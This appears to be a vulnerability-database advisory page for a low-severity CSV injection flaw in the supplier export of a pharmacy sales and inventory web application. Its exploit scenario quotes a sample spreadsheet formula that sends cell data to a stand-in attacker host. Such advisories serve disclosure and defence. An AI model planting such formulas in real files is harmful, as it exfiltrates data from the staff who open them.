Skip to main content

Pharmacy Sales and Inventory System EUVD-2026-33623

| CVE-2026-10248 LOW
Improper Neutralization of Formula Elements in a CSV File (CWE-1236)
2026-06-01 VulDB GHSA-hpq4-4cqf-mcg8
Information Disclosure Pharmacy Sales And Inventory System
2.0
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.0 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
X

Lifecycle Timeline

3
Severity Changed
Jun 01, 2026 - 11:22 NVD
MEDIUM LOW
CVSS changed
Jun 01, 2026 - 11:22 NVD
4.7 (MEDIUM) 2.0 (LOW)
Analysis Generated
Jun 01, 2026 - 11:22 vuln.today

DescriptionCVE.org

A vulnerability was determined in SourceCodester Pharmacy Sales and Inventory System up to 1.0. This issue affects the function create_supplier of the file /Export_csv/export of the component Supplier Creation Interface. This manipulation of the argument Address/Company Name causes csv injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.

AnalysisAI

CSV injection in SourceCodester Pharmacy Sales and Inventory System 1.0 allows high-privileged remote attackers to embed malicious spreadsheet formula payloads via the Address and Company Name fields in the Supplier Creation Interface, which are then written unsanitized to exported CSV files. When downstream staff open the exported file in a spreadsheet application such as Microsoft Excel or LibreOffice Calc, the injected formulas execute in that client application's context, enabling information disclosure, data manipulation, or further client-side exploitation. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate to application with high-privilege credentials
Delivery
Navigate to Supplier Creation Interface
Exploit
Inject formula payload into Address or Company Name field
Install
Save malicious supplier record
C2
Victim exports supplier list via /Export_csv/export
Execute
Victim opens CSV in Excel or LibreOffice
Impact
Formula executes on victim workstation
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold a high-privilege account (PR:H per CVSS vector) on the SourceCodester Pharmacy Sales and Inventory System - the attacker cannot exploit this unauthenticated or with low-privilege credentials. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS base score of 4.7 (Medium) is consistent with the actual risk profile. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A high-privileged attacker with valid application credentials navigates to the Supplier Creation Interface and creates or edits a supplier record, injecting a payload such as '=HYPERLINK("http://attacker.com/?data="&A1,"Click")' or a DDE command string into the Company Name or Address field. A staff member later exports the supplier list via the /Export_csv/export endpoint and opens the resulting file in Microsoft Excel, which interprets the injected formula and either exfiltrates local data to an attacker-controlled server or prompts execution of a system command. …
Remediation No vendor-released patch has been identified at time of analysis - the remediation level in the CVSS temporal vector is listed as Unknown (RL:X), and no patched version is referenced in any available advisory. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-33623 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy